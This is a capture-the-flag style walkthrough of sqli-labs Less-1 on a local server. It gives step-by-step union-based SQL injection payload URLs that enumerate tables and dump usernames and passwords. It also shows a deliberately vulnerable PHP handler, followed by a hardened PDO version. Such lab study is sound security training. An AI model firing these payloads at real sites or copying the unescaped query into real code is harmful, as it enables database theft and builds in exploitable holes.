Start with the first level:
http://127.0.0.1/sqli-labs-master/Less-1/
Test for an error by appending a single quote: http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
You can see an error in the SQL statement.
Test with and 1=1:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1%23 displays normally.
%23 is the URL-encoded "#" comment character.
Test with and 1=2: http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2%23 fails to display the result, indicating there is an injection point.
Determine the number of columns:
With order by 3, the page displays normally:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3%23
With order by 4, the page does not display normally.
So the number of columns is 3.
Find which positions are echoed on the page:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3%23
The echoed positions are 2 and 3.
Use version() to view the version:
Use database() to see the database used by the current website:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),database()%23
As you can see, the PHP version used is 5.5.53, and the database name used by the website is security.
Next, add a where filter to the query to list the tables in the security database:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
There are four tables:
View the columns in the users table:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
See what is in username and password:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users%23
The users table also has an id column, so we can check how many username/password pairs there are.
Just append where id = N to the query.
Testing shows the maximum id is 14.
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 1%23
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 14%23
End of the first level.
The second level will be posted soon.
Note: I changed the official source code. Here is the PHP code I changed:
<?php
// including the mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if (isset($_GET['id'])) {
    $id = $_GET['id'];

    // logging the connection parameters to a file for analysis.
    $fp = fopen('Result.txt', 'a');
    fwrite($fp, 'ID:' . $id . "\n");
    fclose($fp);

    // connectivity
    // $id is placed inside the quoted string unescaped: this is the injection point used above
    $sql = "select * from users where id='$id' limit 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);

    // print the final SQL statement so each test above can be followed
    echo $sql;
    echo "<br>";

    if ($row) {
        echo "<font size='5' color='#99FF00'>";
        echo 'your login name: ' . $row['username'];
        echo '<br>';
        echo 'Your password: ' . $row['password'];
        echo '</font>';
    } else {
        echo '<font color="#FFFF00">';
        // the raw database error is shown on the page (error-based behaviour)
        print_r(mysql_error());
        echo "</font>";
    }
} else {
    echo "Please input the id as parameter with numeric value";
}
?>
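For comparison with the handler above, a hardened version of the same lookup, as an added example that is not part of the original post or of sqli-labs. It assumes PHP 7.1+ with PDO in place of the lab's mysql_* calls, uses an in-memory SQLite table with constructed rows so it runs offline, and the function names find_user() and render() are hypothetical.

```php
<?php
// Added example (not sqli-labs code): hardened version of the Less-1 lookup.
// Assumptions: PHP 7.1+ with PDO; find_user() and render() are hypothetical names.

function find_user(PDO $db, string $rawId): ?array
{
    // Accept digits only. A bare (int) cast is not enough: it would silently
    // turn "1' and 1=2#" into 1 and hide the tampering.
    if (!preg_match('/\A[0-9]{1,9}\z/', $rawId)) {
        return null;
    }
    // The placeholder keeps the value out of the SQL text, so it is never parsed as SQL.
    $stmt = $db->prepare('SELECT username FROM users WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function render(PDO $db, string $rawId): string
{
    try {
        $row = find_user($db, $rawId);
    } catch (PDOException $e) {
        error_log($e->getMessage()); // detail goes to the server log, not the page
        $row = null;
    }
    if ($row === null) {
        return 'No such user'; // same reply for bad input, missing row and DB error
    }
    return 'Your login name: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
}

// Constructed demo data: in-memory SQLite stands in for the lab's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'user-one', 'constructed-1'), (14, 'user-fourteen', 'constructed-14')");

// The id values from the walkthrough, URL-decoded (%23 becomes #).
$inputs = ["1", "14", "1'", "1' and 1=2#", "1' order by 4#",
           "-1' union select 1,username,password from users where id = 14#"];
foreach ($inputs as $id) {
    echo str_pad($id, 66), ' => ', render($db, $id), "\n";
}
```

Unlike the lab handler, this version does not echo the SQL statement, the stored password or the database error text, which are the three outputs the steps above rely on.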
Sqli-labs-master Level 1: error-based GET single-quote string injection